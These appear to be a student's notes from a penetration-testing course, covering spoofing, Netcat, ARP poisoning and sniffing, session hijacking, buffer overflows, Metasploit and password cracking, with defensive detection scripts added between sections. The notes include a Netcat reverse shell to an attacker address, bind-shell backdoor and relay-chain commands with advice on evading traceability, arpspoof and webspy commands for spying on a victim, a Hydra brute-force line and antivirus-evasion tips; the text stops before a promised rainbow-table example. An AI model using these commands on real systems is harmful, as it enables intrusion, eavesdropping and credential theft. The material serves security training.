We can use tools like rpcclient to execute RPC commands on the remote machine.
Defense:
• Change the registry entry RestrictAnonymous to 0x02 [default: 0x01] under
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
• Drop the packets destined for ports 135-139 and 445
Day 3
Spoofing
Sniffing
MAC flooding
ARP spoofing
Session hijacking
DNS poisoning
Buffer overflows
Format string attacks & exploits
Spoofing
Decoy scans with Nmap are examples of spoofing.
They are done to exploit trust relationships, to pass through ACLs, for DoS attacks, and to avoid logging attacker traces.
1. Change IP address
2. TCP sequence guessing
3. Source routing
On Unix, the source IP can be changed via ifconfig.
On Windows, it can be changed via the Network control panel or netsh.
Change IP address
Tools:
Nemesis – it presents itself like a TCP/IP stack; you fill in the data and it crafts the packets
Hping2
Netdude – it can read pcap files and graphically represent the communication. Here we can edit the connection settings etc. and save the capture. Now we are ready for a replay attack.
Now the problem is: how do you go through the TCP 3-way handshake with spoofing? The receiver sends the SYN/ACK to the spoofed address, which sends back a RST. So what's the use? Spoofing is useful for UDP kinds of attacks.
TCP sequence guessing
Mitnick attack to create a 3-way handshake:
Prior to launching the attack, sample as many packets as possible from the admin server and do statistical analysis to predict the sequence number.
1) Disable the admin server
2) Send a spoofed SYN packet
3) Send a spoofed ACK packet with the predicted sequence number
4) From the target machine's perspective, it has established a TCP connection to the admin server
5) Now execute a command: "Please add attacker to the .rhosts file."
6) Now the attacker can directly authenticate with the target machine
Source routing
Defences
1. Make TCP sequence numbers highly random, i.e., always apply the vendor's patch if it belongs to the TCP stack.
2. Be careful with trust relationships (rlogin, rsh). It is advised not to extend trust relationships beyond the firewall, since it is recommended to allow trust relationships only between machines having the same level of control, threat and security. Also, with a firewall we can block intruding attempts.
3. Authentication should not be based on IP address. I.e., if you say "allow only this IP to pass through to the DMZ"… lol, it is spoofable. Hence use some other authentication mechanism like username/password, VPN etc.
4. Replace remote commands like rlogin, rsh, telnet and ftp with SSH.
5. Some legacy systems might not work with SSH etc. In that case, use another machine one hop prior to the legacy machine: connect to that machine in a secure fashion and then use rlogin/rsh to the legacy system.
6. Anti-spoof filters at firewalls. E.g.: if I see a packet with source IP 20.*.*.* from this interface, drop it.
7. Enable Unicast Reverse-Path Forwarding checks on routers. The router checks its routing table for the source address and incoming interface to determine whether the packet is coming from the path the sender would use to reach the destination.
8. No source routing, no IP directed broadcast at border gateways.
Identification
1. Make sure anti-spoof filters generate a log when they detect spoofing. Usually log analyzers such as enVision, which collect logs from firewalls etc., show up these alerts.
2. IDS sensors that look for IP addresses that do not belong here.
Containment
1. Identify the machine and remediate.
Netcat - http://h.ackack.net/cheat-sheets/netcat
It reads and writes data across network connections, using TCP or UDP.
1. Netcat client mode -- it initiates connections
2. Netcat server (listen) mode -- it listens on a TCP/UDP port
Command options:
nc -l – Listen mode
nc – Client mode
nc -L – Listen persistently. When listening normally using nc -l, it waits for a connection; once established and the client terminates the connection, listen mode is also dropped. Whereas in persistent listen mode, even if the client terminates the connection, it is still listening.
nc -u – UDP mode; if no -u, it is TCP
nc -p – In listen mode, it listens on that local port (e.g. 80); in client mode, it sends data from source port 80 (local)
nc -e – Execute a program after the connection has occurred
nc -z – Zero I/O: no data transfer, only the TCP connection is established; may send UDP packets
nc -w <sec> – Wait for connection, e.g. nc -w 3 waits 3 seconds for a connection before it is torn down. Even if the connection is made and there is no data for 3 sec, it will go off.
nc -vv – Very verbose
Uses:
It can be used to transfer files on TCP/UDP ports
Port scanning, banner grabbing
A small vulnerability scanner – what vulnerable services are running on the target
Backdoor
Relay
Suppose we want to do port scanning, It is a good idea to use port 80,443 so as to evade detection.
Also its better to scan ports in a random fashion using –r switch
C:\>nc –v –r 192.168.12.1 1-100
Now connection is established… Whatever you type at client will be visible at server and viceversa.
Transferring IO (Even Files)
We need to use < > | to redirect IO between connections
C:\Mahesh\Tools\NetCat>nc -vv localhost 17876 < readme.txt
Now readme.txt is transferred to another machine listening on port 17876
Backdoor
Not only just input, it can bind an executable on some port specified
On Server,
C:\Mahesh\Tools\NetCat>nc -lvvp 17876 -e calc.exe
listening on [any] 17876 ...
DNS fwd/rev mismatch: localhost != RedPC
On Client,
C:\Mahesh\Tools\NetCat>nc -vv localhost 17876
DNS fwd/rev mismatch: RedPC!= localhost
RedPC [127.0.0.1] 17876 (?) open
Now at client, Calculator has popped up.
Backdoor 2 (Reverse Shell)
Creating a listening shell with Netcat is a valuable technique, but for it to be effective the
attacker needs to be able to send data to the port on which Netcat is listening. This is a problem
if a router or firewall in the path blocks inbound traffic, because the listening port cannot be
reached. With a reverse shell the victim connects out to the attacker, who can then send commands
to the victim to execute.
Attacker: the server is listening for a connection
C:\>nc -lvvp 4444
listening on [any] 4444 ...
Victim: the client sends its terminal to the server
BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash
192.168.0.198: inverse host lookup failed: Unknown
(UNKNOWN) [192.168.0.198] 4444 (krb524) open
Attacker (Alice): after the connection, ready to take commands
It is suggested to use Netcat instead of Telnet when you find an open port on a machine, because
Netcat is fast and Telnet uses telnet control sequences which might blow up some applications running
on the end machine.
Replay Attack
From a pcap file, strip off the headers, save only the content to a file, and transfer it to the target
machine using Netcat. Eg: if we have captured the transaction command "TRANSFER 1000$ from Acc A to Acc B",
replay it.
Relay: when you attack a victim, be untraceable.
Hackers use relays located in at least 5 locations which are geographically distant and have bad
political relationships with each other. Eg: to attack the USA, start with a relay in China -> India ->
Pakistan -> Israel -> Ukraine.
[Figure: relay diagram; only the labels 1 and 2 survived extraction]
The attacker first compromises Relay 1 and Relay 2.
Configure a relay with a Netcat listener on one port piped into a Netcat client that forwards to the
next relay on another port.
Attacker:
C:\>nc <Relay1> 4321
Relay1:
C:\> nc -L -p 4321 | nc <Relay2> 4321
Relay2:
C:\> nc -L -p 4321 | nc <Target> 4321
NOW we have established a one-way channel from the attacker to the target.
Target:
C:\>nc -L -p 4321
<<Not clear, look into it>>
1:17
Defending Against Netcat
- Prevent Netcat file transfers -> firewall configuration issue
- Secure against port scanning -> minimal number of listening ports
- Block arbitrary connections to ports -> close unused ports [every open port should have a
  justification]
- Protect against vulnerability scanning -> apply patches
- Backdoors -> need to know what processes are running so you can detect rogue processes
- Prevent relay attacks -> no single point that an attacker can relay around
- Stop persistent listeners -> periodically check for unexpected listening ports
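A defender's counterpart to the last two points (rogue processes, unexpected listeners), added here as an example that is not part of these notes: it parses constructed `netstat -ano` and `tasklist /fo csv` output from a Windows host against a baseline of expected ports, and flags listeners outside the baseline plus established connections owned by shell-like images. The baseline and the list of shell images are assumptions.

```python
import csv
import io

# Constructed "netstat -ano" output from a Windows host on which the Netcat backdoor from the
# notes (nc -lvvp 17876 -e ...) is listening and a cmd.exe holds an outbound reverse shell.
NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:17876          0.0.0.0:0              LISTENING       3120
  TCP    192.168.0.5:49210      192.168.0.198:4444     ESTABLISHED     3300
  TCP    [::]:135               [::]:0                 LISTENING       812
  UDP    0.0.0.0:500            *:*                                    1020
"""

# Constructed "tasklist /fo csv" output from the same host (PID -> image name).
TASKLIST = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"svchost.exe","812","Services","0","12,345 K"
"System","4","Services","0","1,234 K"
"nc.exe","3120","Console","1","2,048 K"
"cmd.exe","3300","Console","1","3,000 K"
"lsass.exe","1020","Services","0","5,000 K"
"""

# Assumed baseline: the (proto, port) pairs the system build checklist says this host exposes.
BASELINE = {("TCP", 135), ("TCP", 445), ("UDP", 500)}

# Assumed heuristic: images that should never own a network socket on a server.
SHELL_IMAGES = {"nc.exe", "cmd.exe", "powershell.exe"}


def parse_tasklist(text):
    """Map PID -> image name from tasklist CSV output."""
    return {int(row["PID"]): row["Image Name"] for row in csv.DictReader(io.StringIO(text))}


def parse_netstat(text):
    """Parse netstat -ano rows; UDP rows have no State column, so the PID is read from the end."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = fields[0], fields[1], fields[2]
        state = fields[3] if proto == "TCP" else ""
        port = int(local.rsplit(":", 1)[1])      # rsplit keeps IPv6 "[::]:135" intact
        rows.append({"proto": proto, "port": port, "foreign": foreign,
                     "state": state, "pid": int(fields[-1])})
    return rows


def audit(netstat_text, tasklist_text, baseline):
    """Return findings: listeners outside the baseline and shell-owned established connections."""
    images = parse_tasklist(tasklist_text)
    findings = []
    for r in parse_netstat(netstat_text):
        image = images.get(r["pid"], "?")
        listening = r["proto"] == "UDP" or r["state"] == "LISTENING"
        if listening and (r["proto"], r["port"]) not in baseline:
            findings.append(("unexpected-listener", r["proto"], r["port"], image))
        if r["state"] == "ESTABLISHED" and image.lower() in SHELL_IMAGES:
            findings.append(("shell-connection", r["proto"], r["foreign"], image))
    return findings


if __name__ == "__main__":
    for finding in audit(NETSTAT, TASKLIST, BASELINE):
        print(*finding)
```

Run it against real output by piping `netstat -ano` and `tasklist /fo csv` into files and reading them in place of the constructed strings; the baseline should come from the system build documents mentioned at the start of these notes.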
Exercise
Create a backdoor, create a relay.
Scenario: you are sitting outside a firewall that blocks inbound access but allows outbound packets.
How do you get outside access to a listener inside?
SNIFFING
Wireshark: it can parse many protocols.
Sniffit: it can be used in interactive mode, sniffit -i, i.e., it handles interactive sniffing of
sessions in real time. The attacker can directly see what the victim is doing by sniffing the
session in real time.
These tools only do passive sniffing (parsing the packets arriving at the NIC) and hence work in a
hub environment.
Active sniffing: injects packets into the network so as to sniff in a switched environment.
DSniff: a collection of tools for network auditing and penetration testing.
Foiling Switches Using ARP Spoofing [arpspoof]
Over Ethernet, data is transferred in frames containing source and destination MAC addresses. The
destination MAC address is found by sending an ARP request.
On receiving an ARP reply (irrespective of whether it sent an ARP request or not), a machine
updates its ARP cache (the mapping of IP to MAC address).
1. So if the victim host receives an ARP reply containing a valid destination IP (a router, server,
   etc.) and the attacker's MAC address... voila, the victim's machine has been poisoned.
2. Configure your machine with IP forwarding (if the packet is not destined for your MAC, forward
   it to the default gateway).
IP forwarding on Linux: echo 1 > /proc/sys/net/ipv4/ip_forward
[The forwarding hop decrements the TTL; as an investigator, if we can see that the TTL has been
decremented one extra time relative to the initial TTL, that needs looking into.]
In practice ARP replies can also be used for good, such as failover: ARP the router's address to the
failover machine.
Foiling Switches by Flooding the Switch [macof]
1. Send Ethernet frames with spoofed source MAC addresses to the switch so that the MAC address
   table on the switch fills up and no more entries can be loaded.
2. Now some switches go into either a denial-of-service state delivering no packets, or a hub
   state delivering packets out of all interfaces of the switch.
Additional tools with DSniff:
tcpkill
  Kills active TCP connections. When there is a telnet connection, you can break it by sending RST
  packets to both ends; then sniff while the user re-authenticates to gather credentials.
tcpnice
  Injects ICMP source quench messages to slow down the traffic.
filesnarf
  Captures the transferred files.
mailsnarf
  Grabs e-mails sent using SMTP and POP.
msgsnarf
  Grabs messages sent using AOL Instant Messenger, ICQ, Internet Relay Chat, and
  Yahoo! Messenger.
urlsnarf
  Grabs the URLs visited.
webspy
  Using the URLs captured from the network, displays the pages viewed by the victim on the
  attacker's browser. Essentially, webspy lets the attacker look over the victim's shoulder as the
  victim surfs the Web. Webspy is quite useful for demos to management.
  HTTPS doesn't work with it.
  Things that authenticate using cookies etc. may or may not work.
Exercise: WebSpying on a Victim
1. Enable IP forwarding [or use fragrouter with no fragmentation]
   # echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP-poison the victim and the gateway
   # arpspoof -i eth0 -t 192.168.1.5 192.168.1.1 [poison the target with the gateway IP]
   # arpspoof -i eth0 -t 192.168.1.1 192.168.1.5 [poison the gateway with the target IP]
   Now you are the man in the middle.
3. Use webspy to grab the browser traffic [IE and Netscape]
   # webspy -i eth0 192.168.1.5 [spy on the target IP's traffic]
4. Start a browser from the command line
   # firefox &
5. Now you can see what the victim is browsing.
Just a tip: if possible, have the proxy log User-Agent types in web traffic; from them we can identify
malware-infected machines and their traffic.
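The detection side of the ARP poisoning described above, added here as an example that is not part of these notes or of DSniff: an arpwatch-style passive monitor fed a constructed ARP trace using the gateway and victim addresses from the exercise, which raises alerts on unsolicited replies, on an IP whose MAC changes, and on one MAC answering for both the gateway and another host (the pattern the two arpspoof commands produce). The MAC addresses and the alert names are constructed.

```python
from collections import defaultdict

# Constructed ARP trace as (seq, op, sender_ip, sender_mac, target_ip); the IPs are the gateway
# and victim from the exercise above, the MACs are made up. Events 3 and 4 are what the two
# arpspoof commands produce: one MAC answering for both the gateway and the victim.
TRACE = [
    (1, "request", "192.168.1.5", "aa:aa:aa:aa:aa:05", "192.168.1.1"),
    (2, "reply",   "192.168.1.1", "aa:aa:aa:aa:aa:01", "192.168.1.5"),  # real gateway answers
    (3, "reply",   "192.168.1.1", "cc:cc:cc:cc:cc:99", "192.168.1.5"),  # poison victim's cache
    (4, "reply",   "192.168.1.5", "cc:cc:cc:cc:cc:99", "192.168.1.1"),  # poison gateway's cache
]


class ArpMonitor:
    """Passive ARP watcher (assumed design, not a tool from the notes)."""

    def __init__(self, gateway_ip, allowed_changes=()):
        self.gateway_ip = gateway_ip
        self.allowed = set(allowed_changes)  # (ip, new_mac) pairs expected from planned failover
        self.cache = {}                      # ip -> mac learned from replies
        self.pending = set()                 # (requester_ip, target_ip) requests not yet answered
        self.claims = defaultdict(set)       # mac -> ips it has answered for
        self.alerts = []

    def observe(self, seq, op, sender_ip, sender_mac, target_ip):
        if op == "request":
            self.pending.add((sender_ip, target_ip))
            return
        # A reply says "sender_ip is-at sender_mac". Hosts accept it whether or not they asked,
        # which is the weakness the notes describe, so an unsolicited reply is the first signal.
        if (target_ip, sender_ip) in self.pending:
            self.pending.discard((target_ip, sender_ip))
        else:
            self.alerts.append((seq, "unsolicited-reply",
                                f"{sender_ip} is-at {sender_mac} sent to {target_ip} without a request"))
        old = self.cache.get(sender_ip)
        if old and old != sender_mac and (sender_ip, sender_mac) not in self.allowed:
            self.alerts.append((seq, "mapping-changed",
                                f"{sender_ip} moved from {old} to {sender_mac}"))
        self.cache[sender_ip] = sender_mac
        self.claims[sender_mac].add(sender_ip)
        others = self.claims[sender_mac] - {self.gateway_ip}
        if self.gateway_ip in self.claims[sender_mac] and others:
            self.alerts.append((seq, "gateway-impersonation",
                                f"{sender_mac} answers for gateway {self.gateway_ip} and {sorted(others)}"))


def run(trace, gateway_ip, allowed_changes=()):
    """Feed a trace through the monitor and return its alerts as (seq, kind, detail)."""
    monitor = ArpMonitor(gateway_ip, allowed_changes)
    for event in trace:
        monitor.observe(*event)
    return monitor.alerts


if __name__ == "__main__":
    for alert in run(TRACE, "192.168.1.1"):
        print(*alert)
```

The legitimate failover case mentioned above also changes an IP-to-MAC mapping; pass those planned (ip, mac) pairs as `allowed_changes` so the monitor does not treat them as poisoning.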
DNSSpoof
WEBMITM (Web Monkey in the Middle): it acts as a proxy.
After DNS spoofing, the victim comes to you for the service he is trying to reach. Eg: he wants to go
to the banking site www.abcbank.com; dnsspoof running on the attacker's machine sends a spoofed DNS
response to the victim claiming to be abcbank.com. Now the user comes to you.
Now you have to either phish the site or proxy the site.
The problem with the above is certificate errors. The victim is presented with the attacker's
certificate, not the abcbank.com certificate, and the browser warns the user that somebody is
pretending to be their bank.
[Figure: Firefox certificate warning]
The top warning box can be avoided by having a certificate signed by a CA.
The second warning box is caused by the browser noticing that the DNS name in the certificate does
not match the name of the Web site the user is trying to access.
A careful attacker can make sure the name on the certificate matches the domain name of the Web
server, but a legitimate, trustworthy Certificate Authority should never sign such a bogus
certificate for someone impersonating a bank.
Unfortunately, most users just click yes..yes..yes to establish an SSL connection with an untrusted site.
The same works for SSH also.
Defences
- System administrators, network managers, and security personnel should understand and use secure
  protocols to conduct their job activities.
- For networks containing very sensitive systems and data, enable port-level security on your
  switches, i.e., bind the MAC address to a port using port security.
- For extremely sensitive networks like Internet DMZs, use static ARP tables on the end machines,
  hard-coding the MAC-to-IP address mapping for all systems on the LAN. This takes extra overhead
  when changing NIC components.
Identification
- On a suspect Unix machine, run ifconfig: if the word PROMISC is there, it is listening.
- On Windows, use PromiscDetect, another free tool, at
  http://ntsecurity.nu/toolbox/promiscdetect
- To detect remotely, use Sentinel, which uses the EtherARP, EtherPing and DNS tests to identify
  sniffers.
  o EtherARP: send an ARP request to the suspect IP with a bogus MAC; if a response is received,
    it is listening.
  o EtherPing: same as EtherARP, but it uses an ICMP ping. If it isn't sniffing, it should not
    see the ping.
  o DNS test: send a DNS request, and check whether any other machine does a reverse DNS lookup
    of that name.
Containment
If detected on one machine, it may be present on other machines.
Eradication
Check for rootkits and identify the process that is listening in promiscuous mode.
Recovery
Monitor the attacker's activity, as he is likely to use the information gathered by sniffing.
Day 3 Session 2
Session Hijacking
Tools:
o Hunt
o Dsniff --- sshmitm
o Ettercap
o Juggernaut
o IP Watcher, TTYWatcher, TTYSnoop
- Network-based session hijacking
  o Combines spoofing and sniffing
  o Alice and Bob have an existing connection
  o Trudy is sniffing packets (on the LAN)
  o Trudy starts injecting packets
  o Bob thinks the packets came from Alice
- This works even if strong authentication is used, provided there is no encryption
ACK Storm
The ACK storm can be avoided by using Ettercap, with Eve becoming man in the middle through ARP
poisoning. Now Eve sniffs the packets destined for DD.DD... and replays them to Bob.
Whenever packets actually travel between Alice and Bob, Ettercap will "fix" the sequence numbers on
those packets before forwarding them on. Alice and Bob don't notice any discontinuity in the
sequence number stream, so no ACK storm results.
If Eve is far from Alice and Bob, Eve has to ARP-poison the routers/switches between Eve and Alice
and between Eve and Bob.
Defense
Encrypted sessions prevent session hijacking because the attacker will not have the keys to encrypt or
decrypt information. Therefore, an attacker cannot inject meaningful traffic into a session.
Use all the defenses that apply to sniffing and spoofing.
Identification
Users might report that they lose sessions.
Error messages from ssh that the server keys have changed.
Eradication
Check for rootkits and change the passwords.
DNS Cache Poisoning
>> Search <<
Buffer overflows
SANS_3B – 50:00
Stack Based Buffer Overflow
This can be exploited when input sanitization and input checking are not performed by the
application.
When a function call is made, execution of the caller stops and its return address is stored on the
stack so as to resume after the called function completes [Return PTR].
The current state of the registers is stored as the saved frame pointer.
In the function, memory for the local variables is allocated in the stack buffer.
Suppose the input is more than the variable can hold: the input data overflows and overwrites the
Return PTR.
Now when the function completes and the original program resumes, it loads the value in the Return
PTR, which has been overwritten by the malicious input.
Usually the value in the Return PTR is replaced with the address on the stack that holds the malicious
shell code.
Culprit: missing input bound checking.
1. Identify the buffer size, i.e., identify the exact location of EIP. Input a very long pattern;
   when the application crashes, look into the technical information: if the segmentation fault was
   caused by trying to access a location that is part of the input sequence we supplied, that tells
   us the location of EIP. [Brute-force fuzzing]
2. The exploit is tailored to the operating system and architecture.
3. If the exploit is too large to fit, split the exploit. Eg: part of the exploit is in one field and
   the remainder in another field. After the overflow of one field, the shell code does a JMP to the
   code in the other field.
4. Another method is staged loading: a small exploit runs; when it reaches the end of its code it
   fetches the next exploit data, loads it into the same space and runs again.
5. If you are not sure of the exact location of the exploit code, use NOP NOP NOP NOP <EXPLOIT>. Now
   even if the return pointer lands in the NOPs, execution slides through them and finally runs the
   exploit.
Metasploit
Exploit: the thing that triggers the condition so that we can execute code.
Payload: the actual code that executes; it can be the machine code of a shell, a command to add
another user, etc.
It has an arsenal of exploits.
Metasploit offers a huge set of payloads, that is, the code the attacker wants to run on the target
machine, triggered by the exploit itself. An attacker using Metasploit can choose from any of the
following payloads to foist on a target:
- Bind shell to current port. This payload opens a command shell listener on the target machine
  using the existing TCP connection of a service on the machine. The attacker can then feed
  commands to the victim system across the network to execute at a command prompt.
- Bind shell to arbitrary port. This payload opens a command shell listener on any TCP port of the
  attacker's choosing on the target system.
- Reverse shell. This payload shovels a shell back to the attacker on a TCP port. With this
  capability, the attacker can force the victim machine to initiate an outbound connection, sent to
  the attacker, polling the bad guy for commands to be executed on the victim machine. So, if a
  network or host-based firewall blocks inbound connections to the victim machine, the attacker
  can still force an outbound connection from the victim to the attacker, getting commands from
  the attacker for the shell to execute. As we discuss in Chapter 8, Phase 3: Gaining Access Using
  Network Attacks, the attacker will likely have a Netcat listener waiting to receive the shoveled
  shell.
- Windows VNC Server DLL Inject. This payload allows the attacker to control the GUI of the
  victim machine remotely, using the Virtual Network Computing (VNC) tool sent as a payload.
  VNC runs inside the victim process, so it doesn't need to be installed on the victim machine in
  advance. Instead, it is inserted as a DLL inside the vulnerable program to give the attacker
  remote control of the machine's screen and keyboard.
- Reverse VNC DLL Inject. This payload inserts VNC as a DLL inside the running process, and then
  tells the VNC server to make a connection back to the attacker's machine, in effect shoveling the
  GUI to the attacker. That way, the victim machine initiates an outbound connection to the
  attacker, but allows the attacker to control the victim machine.
- Inject DLL into running application. This payload injects an arbitrary DLL of the attacker's
  choosing into the vulnerable process, and creates a thread to run inside that DLL. Thus, the
  attacker can make any blob of code packaged as a DLL run on the victim.
- Create Local Admin User. This payload creates a new user in the administrators group with a
  name and password specified by the attacker.
- The Meterpreter. This general-purpose payload carries a very special DLL to the target box. This
  DLL implements a simple shell, called the Metasploit Interpreter.
  o It does not create a new process, it just runs inside the vulnerable app -> no detection.
  o It doesn't touch the hard drive -> no evidence.
  o Although the vulnerable application has limited access restrictions, Meterpreter's commands
    have full privileges -> great control for the attacker.
  PRIV is an extension that is injected and carries a bunch of privilege escalation attacks, so that
  even if a user with limited privileges is exploited, the attacker can run commands with admin
  privileges.
Meterpreter 3
- Polymorphic code, used to avoid signature detection by AV
  o XOR the exploit code with a key
  o Randomized NOP generator: use functional equivalents of code that does nothing, e.g.
    multiplying AH by 1, adding 0 to CX, etc., at various places in the exploit code to evade
    detection
Exercise:
1. Most machines have a TFTP client on them. So exploit the target machine and get a little shell on it.
2. In the shell, get Netcat using TFTP.
3. Use Firewalk to identify which packets are allowed and use the corresponding mechanism to
   transfer files. [Some firewalls block the outgoing TFTP port; then use FTP, and if not, use SSH.]
4. Use a bind shell or reverse shell to take control.
Defending
- Apply patches
- Use HIPS
  o They observe syscalls
  o Look into memory, look for strange jumps
- Non-executable stacks
  o On Windows, DEP (Data Execution Prevention)
  o On Solaris, by default
  o On Linux, there are patches by "Solar Designer"
  Attacker: OK, no problem, I will use functions that are already in libc or ntdll.dll to carry out
  the malicious activity; I am just using the functional components that are necessary and allowed
  for the application. (Return-to-libc, return-to-ntdll)
- Use StackShield: Stack Shield is a tool for adding protection to programs against this kind of
  attack at compile time without changing a line of code. Stack Shield uses a more secure
  protection system than other tools like Immunix StackGuard. Stack Shield is designed to support
  GCC on a Linux Intel 386 class platform.
- Avoid programming errors
- Use static code analysis tools
Parser Vulnerabilities
An IDS/IPS parses data packets to analyze them and pass them through. Some maliciously crafted
packets, when parsed by the IDS/IPS, cause a buffer overflow and thus blind the IDS: to management
it shows no suspicious packets (but it is actually not detecting them).
File parsers also suffer buffer overflows when a maliciously crafted file is opened. Eg: when you open
a JPEG file, it executes malicious code.
Format String Attacks
C:\Mahesh\Tools\NetCat>sort %x%x%x
7c812fd900The system cannot find the file specified.
7c812fd900 is the value on the stack.
- %x reads and prints 4 bytes from the stack
  o this may leak sensitive data
- %n writes the number of characters printed so far onto the stack
  o this allows stack overflow attacks...
- C format strings break the "don't mix data & code" principle.
- Easy to spot & fix:
  o replace printf(str) by printf("%s", str)
>>>Checkout formatflaw.c<<<
>>>Some Exercises in last 20 mins<<<
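The "easy to spot & fix" rule above and the "use static code analysis tools" defence from the buffer overflow section, turned into a small checker; this is an added example, not code from the notes or from any real analysis tool. It blanks out C comments, finds calls to printf-family functions whose format argument is not a string literal, and flags calls with no destination length (gets, strcpy, strcat, sprintf), reporting the line of each. The constructed C snippet it scans contains both defects beside their fixes.

```python
import re

# Constructed C snippet mixing the two defects discussed above with their fixes.
SAMPLE = r"""#include <stdio.h>
#include <string.h>

void log_user(const char *name) {
    char buf[32];
    strcpy(buf, name);                       /* no bound check: stack buffer overflow */
    printf(name);                            /* user data used as the format string */
    printf("%s\n", name);                    /* the fix: data stays data */
    snprintf(buf, sizeof buf, "%s", name);   /* bounded copy, literal format */
}
"""

# Position of the format argument for each printf-style function.
FORMAT_FUNCS = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2, "syslog": 1}
# Calls that never check the destination size (the "input bound checking" culprit).
UNBOUNDED_FUNCS = {"gets", "strcpy", "strcat", "sprintf"}
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")


def strip_comments(src):
    """Blank out C comments but keep their newlines so line numbers stay right."""
    return re.sub(r"/\*.*?\*/|//[^\n]*", lambda m: "\n" * m.group().count("\n"), src, flags=re.S)


def split_args(text, open_paren):
    """Return the argument list of the call whose '(' is at text[open_paren]."""
    depth, in_str, cur, args = 0, None, [], []
    i = open_paren
    while i < len(text):
        ch = text[i]
        if in_str:
            cur.append(ch)
            if ch == "\\":                  # keep escaped characters inside the literal
                cur.append(text[i + 1])
                i += 1
            elif ch == in_str:
                in_str = None
        elif ch in "\"'":
            in_str = ch
            cur.append(ch)
        elif ch == "(":
            depth += 1
            if depth > 1:
                cur.append(ch)
        elif ch == ")":
            depth -= 1
            if depth == 0:
                args.append("".join(cur).strip())
                break
            cur.append(ch)
        elif ch == "," and depth == 1:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    return args


def scan_c_source(src):
    """Return (line, kind, message) findings for format-string and unbounded-copy calls."""
    code = strip_comments(src)
    findings = []
    for m in CALL_RE.finditer(code):
        name = m.group(1)
        if name not in FORMAT_FUNCS and name not in UNBOUNDED_FUNCS:
            continue
        args = split_args(code, m.end() - 1)
        line = code.count("\n", 0, m.start()) + 1
        fmt_idx = FORMAT_FUNCS.get(name)
        if fmt_idx is not None and fmt_idx < len(args) and not args[fmt_idx].startswith('"'):
            findings.append((line, "format-string",
                             f"{name}: format argument '{args[fmt_idx]}' is not a literal; "
                             f"pass it as data via a \"%s\" format instead"))
        if name in UNBOUNDED_FUNCS:
            findings.append((line, "unbounded-copy",
                             f"{name}: no length limit on the destination buffer"))
    return findings


if __name__ == "__main__":
    for line, kind, message in scan_c_source(SAMPLE):
        print(f"line {line}: {kind}: {message}")
```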
Day 4
Missing user input sanitization is the major culprit behind attacks such as buffer overflows, format
string attacks, SQL injection, etc. If the application is prone to such attacks, the attacker can
inject a command shell to carry out further attacks.
Eg: exploiting the Unicode vulnerability in Windows IIS
Password cracking
Password crack resources: http://www.skullsecurity.org/wiki/index.php/Passwords
Default passwords: http://www.phenoelit-us.org/dpl/dpl.html
Password Guessing:
Hydra: http://freeworld.thc.org/thc-hydra/
It supports many protocols: Telnet, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL,
MYSQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, and
Cisco AAA.
# hydra -l <user> -P <passworddictionary> -v <target> <protocol>
In the class example this brute-forced 192.168.0.112 for the user ftp with the list of passwords
stored in passwords.txt.
- It is time-consuming and resource intensive
- It generates IDS alerts
- Usually machines are configured to lock accounts after multiple login failures
- It can also be used as a DoS attack
Password Cracking:
Passwords are stored either in encrypted form or as a hash (message digest) on the machine that
authenticates the user at login.
Hybrid password cracking: the password-cracking tool starts guessing passwords using a dictionary
term. Then it creates other guesses by appending or prepending characters to the dictionary term,
methodically adding characters to words in a brute-force fashion.
Password cracking for a botnet owner would be fairly easy and simple.
- Cain, a fantastic free tool available from Massimiliano Montoro at www.oxid.it/cain.html
- John the Ripper, a powerful free password cracker for UNIX/Linux and some Windows
  passwords, written by Solar Designer, available at www.openwall.com/john
- Pandora, a tool for testing Novell Netware, including password cracking, written by Simple
  Nomad, and available at www.nmrc.org/project/pandora
- LC5, the latest incarnation of the venerable L0phtCrack password cracker, an easy-to-use but
  rather expensive commercial password cracker at www.atstake.com/products/lc/purchase.html
CAIN:
It's not just a password cracker; it is a multitude of tools.
- WLAN discovery like NetStumbler
- Identify whether a target is sniffing packets
- Network discovery
- Captures interesting packets on the network containing user IDs etc.
- A tool to dump and reveal all encrypted or hashed passwords cached on the local
  machine, including the standard Windows LM and NT password representations, as well
  as the application-specific passwords for Microsoft Outlook, Outlook Express, Outlook
  Express Identities, Outlook 2002, Microsoft Internet Explorer, and MSN Explorer.
- An ARP cache poisoning tool, which can be used to redirect traffic on a LAN so that an attacker
  can more easily sniff in a switched environment
- A remote command shell, rather like the backdoor command shells
- A remote route table manager, so an administrator can tweak the packet routing rules on a
  Windows machine.
- A remote TCP/UDP port viewer that lists local ports listening on the system running Abel, rather
  like the Active Ports and TCPView tools.
- A remote Windows password hash dumper, which an attacker can use to retrieve the
  encrypted and hashed Windows password representations from the Security Accounts Manager
  (SAM)
Password Cracking On Windows
1. Retrieve the LM hash and NTLM hash from the SAM database
2. Use Cain to crack them.
Retrieving Hashes
C:\Windows\repair\sam._
[the original SAM file cannot be opened/copied]
Cain can retrieve LM/NTLM hashes from challenge packets on the network.
- Whenever anyone authenticates to the domain or tries to access a share, the attacker can
  run Cain in sniffing mode to snag user authentication information from the network.
- So the attacker can entice the victim into making such an authentication, eg: sending a mail
  that opens a shared drive which needs authentication, etc.
It also supports rainbow tables.
Rainbow tables: a rainbow table is a lookup table of precomputed hashes that can be matched
against the hash that needs to be cracked. It helps recover plaintext passwords.
Salts make cracking with rainbow tables difficult. Usually they are 64 bits in most systems.
Unfortunately no salt is used for Windows NTLM hashes.
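To make the rainbow table and salt argument above concrete, an added example (not from the notes or from Cain): a toy rainbow table over 4-digit PINs with proper chains and per-column reduction functions, then the same lookup against a hash computed with a 64-bit salt, which fails unless a whole new table is built for that salt. sha256 stands in for the unsalted NTLM hash; the keyspace, chain parameters and reduction function are constructed.

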